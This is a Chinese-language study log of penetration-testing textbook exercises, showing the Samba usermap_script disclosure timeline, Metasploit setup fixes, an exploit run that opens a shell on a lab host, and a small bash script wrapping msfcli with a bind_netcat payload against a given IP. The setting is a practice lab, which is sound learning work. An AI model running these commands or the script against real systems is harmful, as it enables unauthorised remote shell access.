书本p39
1、The time line is as follows:
* May 7, 2007: Initial defect disclosure to the security@samba.org
email alias.
* May 7, 2007: Initial developer response by Samba
developer Gerald Carter.
* May 9, 2007: Patch released by Samba developer Jeremy
Allison to iDefense for testing.
* May 10, Announcement to vendor-sec mailing list
* May 14, 2007: Public announcement of the security issue.
2、 先找出metasploit安装位置:
# dpkg -S metasploit
在/usr/share/metasploit-framework中
/usr/share/metasploit-framework/modules/exploits# ls aix apple_ios dialup freebsd irix multi osx unix android bsdi firefox hpux linux netware solaris windows
用Linux Shell命令统计出分别针对Windows 2000、Windows XP……目标环境的渗透攻击模块数量(不会,暂且跳过)
3、运行msfconsole:
msf > db_status
[*] postgresql selected, no connection
解决办法可参考:http://r-7.co/MSF-DEV#set-up-postgresql (太长,我还没试验过)
因为和书上有不少不同之处,我最后还是直接决定用作者提供的BT5虚拟镜像。
换上bt5后,好酷炫的界面!但是ip地址是10.10.10.129,和剧本不符!重新设置下:
# vi /etc/networks/interface …skip…(将ip配置为静态的10.10.10.128) # /etc/init.d/networking restart
打开msfconsole:
msf > db_status
[*] postgresql connected to msf3dev
补充: 关于kali 2.0中msf与数据库连接的问题,可参考http://www.cnblogs.com/justforfun12/p/5205804.html
数据库的问题解决!
msf> use exploit/multi/samba/usermap_script msf> show options msf> set RHOST 10.10.10.254 msf> exploit
[*] Command shell session 1 opened (10.10.10.128:4444 -> 10.10.10.254:33721)
成功得到shell
VNC不熟悉,暂且跳过。
5、
# vim us_attack.sh 1 #!/bin/bash 2 # 3 # A shell script that uses usermap_script exploit to penetrate 4 # other's system. 5 # User needs to input the ip for RHOST as the only parameter. 6 # 7 # 2016.2.21 by Jack 8 # 9 10 msfcli multi/samba/usermap_script PAYLOAD=/cmd/unix/bind_netcat RHOST=$1 E
执行
# sh us_attack.sh 10.10.10.254
搞定!
不过发现了个问题:就是一开始从BT5去ping 10.10.10.254(NAT)是ping 不通的,需要先从NAT ping回10.10.10.128(NAT)才行。
用BT5其实也有很大问题,因为它的服务器停止更新,APT-GET 不能用了!